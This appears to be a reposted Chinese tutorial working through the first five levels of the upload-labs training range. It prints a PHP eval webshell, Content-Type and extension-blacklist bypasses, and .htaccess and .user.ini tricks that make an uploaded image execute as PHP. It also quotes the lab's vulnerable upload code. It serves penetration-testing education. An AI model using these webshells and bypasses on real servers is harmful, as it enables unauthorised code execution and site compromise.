赞
踩
upload-labs
是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关,每一关都包含着不同上传方式。在2019年11月添加新的pass-05后关卡总数为21关。
首先下载靶场源码,将靶场在自己的主机中部署。在git bash
中使用命令
git clone https://github.com/c0ny1/upload-labs
下载源码后使用phpstudy配置需要的环境。
配置项 | 配置 | 描述 |
---|---|---|
操作系统 | Window or Linux | 推荐使用Windows ,除了Pass-19 必须在linux 下,其余Pass 都可以在Windows 上运行 |
PHP版本 | 推荐5.2.17 | 其他版本可能会导致部分Pass 无法突破 |
PHP组件 | php_gd2,php_exif | 部分Pass 依赖这两个组件 |
中间件 | 设置Apache 以moudel 方式连接 |
这里专门提到了
pass19
需要在linux
下,是因为pass19
的绕过方式使用了move_uploaded_file()
省略文件末尾/.
的特性绕过黑名单的,而在windows
中文件名称不允许存在此类特殊字符。其他的配置无需过多操作,都可以使用推荐值。
安装完成之后访问http:127.0.0.1/upload-labs/
,效果如图。
此时我们还需要自己的一个一句话木马,来测试上传执行的情况到底如何,这里使用REQUEST方法的木马,方便我们测试。
<?php eval($_REQUEST['cmd']); ?>
当访问127.0.0.1/test.php?cmd=phpinfo();
出现php配置页面时,前置的准备工作就到这里结束了,下面开始正式尝试每一关的上传绕过。
点入第一关,首先进行黑盒测试,随意上传一个php类型的文件尝试。
当上传我们的test.php
文件时,会出现前端的提示,因此推测限制在js
代码中,这里从源码中也可以看到这段代码。
因此我们可以选择使用火狐插件Disable JavaScript
将js
在本地关闭,或者上传允许的后缀名,然后直接抓包绕过。将已选择的test.jpg
修改为test.php
即可成功上传。
选择php类型的文件上传,返回错误的文件类型。
通过观察源码可以看到,每次提交都会将本次的文件传递给函数checkFile()
,来检测文件的类型,代码部分如下。
这里我们抓包进行测试,首先上传一个jpg类型的正常文件。
可以看到提交的content-type
为image/jpeg
,那么我们直接修改filename
中的后缀名为php
,发现可以直接上传成功。
而相反的,当我们上传一个php后缀类型的文件时,抓包看到的content-type
为application/octet-stream
,这时我们将filename
修改为jpg
类型的后缀名都不会成功,因此推测pass2中的判断应当是在数据包中的content-type
字段。
点击查看源码,验证我们的猜想。
$is_upload = false; $msg = null; if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) { $temp_file = $_FILES['upload_file']['tmp_name']; $img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name'] if (move_uploaded_file($temp_file, $img_path)) { $is_upload = true; } else { $msg = '上传出错!'; } } else { $msg = '文件类型不正确,请重新上传!'; } } else { $msg = UPLOAD_PATH.'文件夹不存在,请手工创建!'; } }
可以看到判断的主要依据是$_FILES['upload_file']['type']
,这个全局变量中的type类型自动返回文件的 MIME
类型,需要浏览器提供该信息的支持,例如"image/gif"
,所以当我们抓包修改浏览器发送给服务器的content-type
后就可以绕过这一判断。
选择php类型的文件上传,提示:不允许上传.asp,.aspx,.php,.jsp
后缀文件!
这是一个黑名单后缀绕过的题目,但从提示中我们可以看到,php的其他解析类型并没有被限制,例如:不同版本的php
文件
.php2;.php3;.php4;.php5;.php6
修改我们php文件的后缀名称为php3测试,发现可以上传,但却无法解析,代码直接被当作文本显示出来了。
但这里是本地机器配置的问题,绕过这一关的方式就是使用未被限制的后缀名来突破,下面来进行多后缀名的php解析配置。
在phpstudy
中点击配置文件管理,打开httpd.conf
。
在打开的文件中找到被注释的AddType
行,
将.php2;.php3;.php4;.php5;.php6
添加,并将注释移除,重启Apache
服务器后再次尝试。
此时已经可以解析php3文件类型了。
在本关中,上传的所有文件都被重新命名了,所以直接上传.htaccess
文件是行不通的,但是我们需要知道,在apache服务器中使用.htaccess
文件是可以更改解析方式的。
当文件中填写AddType application/x-httpd-php .php3
代码,表示将php3类型的文件以php方式解析。
这时在访问也可以解析。
$is_upload = false; $msg = null; if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { $deny_ext = array('.asp','.aspx','.php','.jsp'); $file_name = trim($_FILES['upload_file']['name']); $file_name = deldot($file_name);//删除文件名末尾的点 $file_ext = strrchr($file_name, '.'); $file_ext = strtolower($file_ext); //转换为小写 $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA $file_ext = trim($file_ext); //收尾去空 if(!in_array($file_ext, $deny_ext)) { $temp_file = $_FILES['upload_file']['tmp_name']; $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext; if (move_uploaded_file($temp_file,$img_path)) { $is_upload = true; } else { $msg = '上传出错!'; } } else { $msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件!'; } } else { $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!'; } }
1、 从源代码我们可以看到,这次的限制来自于$file_ext
也就是处理后的后缀名。
2、 且由于strtolower
转换小写函数的存在,大小写绕过并不能成功,这里与Linux
和windows
都没有关系。
3、 而由于str_ireplace('::$DATA', '', $file_ext);
函数的存在,使得windows数据流绕过也不可能。
这里引用了一段解析:
在window的时候如果文件名
+"::$DATA"
会把::$DATA
之后的数据当成文件流处理,不会检测后缀名,且保持::$DATA
之前的文件名,他的目的就是不检查后缀名
例如:"phpinfo.php::$DATA"Windows
会自动去掉末尾的::$DATA
变成"phpinfo.php"
4、 因为$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
的存在,我们无法自己上传.htaccess
文件,因为上传后均会被重新命名。
第四关与第三关都是后缀黑名单类型的绕过,我们直接看代码来寻找他们之间的关系。
$is_upload = false; $msg = null; if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { $deny_ext = array(".php",".php5",".php4",".php3",".php2",".php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".ini"); $file_name = trim($_FILES['upload_file']['name']); $file_name = deldot($file_name);//删除文件名末尾的点 $file_ext = strrchr($file_name, '.'); $file_ext = strtolower($file_ext); //转换为小写 $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA $file_ext = trim($file_ext); //收尾去空 if (!in_array($file_ext, $deny_ext)) { $temp_file = $_FILES['upload_file']['tmp_name']; $img_path = UPLOAD_PATH.'/'.$file_name; if (move_uploaded_file($temp_file, $img_path)) { $is_upload = true; } else { $msg = '上传出错!'; } } else { $msg = '此文件不允许上传!'; } } else { $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!'; } }
这次数组中几乎包含了所有可解析类型的脚本文件后缀, 所以我们不能向上次一样直接上传不同版本的php文件了,但是我们发现在上传文件后只进行了移动,没有进行更名,所以可以使用上传.htaccess
文件的方式来增加解析文件的类型。
.htaccess文件
(或者”分布式配置文件”)提供了针对每个目录改变配置的方法,即在一个特定的目录中放置一个包含指令的文件,其中的指令作用于此目录及其所有子目录。
我们设置文件内容为:
AddType application/x-httpd-php .jpg
即可让jpg解析为php文件。
首先上传.htaccess
文件,再上传内容为一句话木马的jpg
文件,即可让jpg
以php
形式解析。
上传的 jpg
文件内容为:
<?php
echo "Test!";
@eval($_REQUEST['cmd']);
?>
上传完成后的文件目录为:
访问test.jpg
文件即可。
在第五关中,禁止了.htaccess文件的上传,源码如下。
$is_upload = false; $msg = null; if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess"); $file_name = trim($_FILES['upload_file']['name']); $file_name = deldot($file_name);//删除文件名末尾的点 $file_ext = strrchr($file_name, '.'); $file_ext = strtolower($file_ext); //转换为小写 $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA $file_ext = trim($file_ext); //首尾去空 if (!in_array($file_ext, $deny_ext)) { $temp_file = $_FILES['upload_file']['tmp_name']; $img_path = UPLOAD_PATH.'/'.$file_name; if (move_uploaded_file($temp_file, $img_path)) { $is_upload = true; } else { $msg = '上传出错!'; } } else { $msg = '此文件类型不允许上传!'; } } else { $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!'; } }
通过阅读代码我们可以看到,几乎禁止了所有可解析的脚本语言类型和变种。
有很多大佬都说pass5
可以通过PHP
和PHp
大小写的情况绕过,但在作者更新插入一个新的pass5
后,添加了$file_ext = strtolower($file_ext);
转小写这一函数,所以大部分大佬所说的情况在pass5都不适用了。
点击提示我们可以看到作者的提示。
也就是说我们需要利用已经存在php文件来完成本次上传。
这里参考了book4yi师傅的.user.ini配置文件在渗透中的利用一文,通过适用.user.ini
文件来修改当前目录下的php
配置,使每一个php
文件都包含指定的文件,从而完成上传。
例如,我们写一个.user.ini文件,内容如下:
auto_prepend_file = test.jpg
而test.jpg
的内容为我们上边一直使用的一句话木马:
<?php
echo "Test!";
@eval($_REQUEST['cmd']);
?>
上传两个文件后的upload目录如图所示。
此时我们访问readme.php
,观察是否已经包含test.jpg
成功包含。
但是这里有个坑,我现在的环境是php-5.4.45-nts+Apache
,所以利用成功了,起初我使用的是
php-5.4.45+Apache
,利用失败;phpstudy2018
版本,未成功;php
版本,未成功;nts
的任意php
版本,成功。nts
和ts
的差别,当使用nts
版本时就可以成功包含指定的文件,目前没有找到原因,网上对nts
和ts
并没有指出在配置方面有什么区别,仅仅是在线程安全方面有所不同,希望师傅们解惑。Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。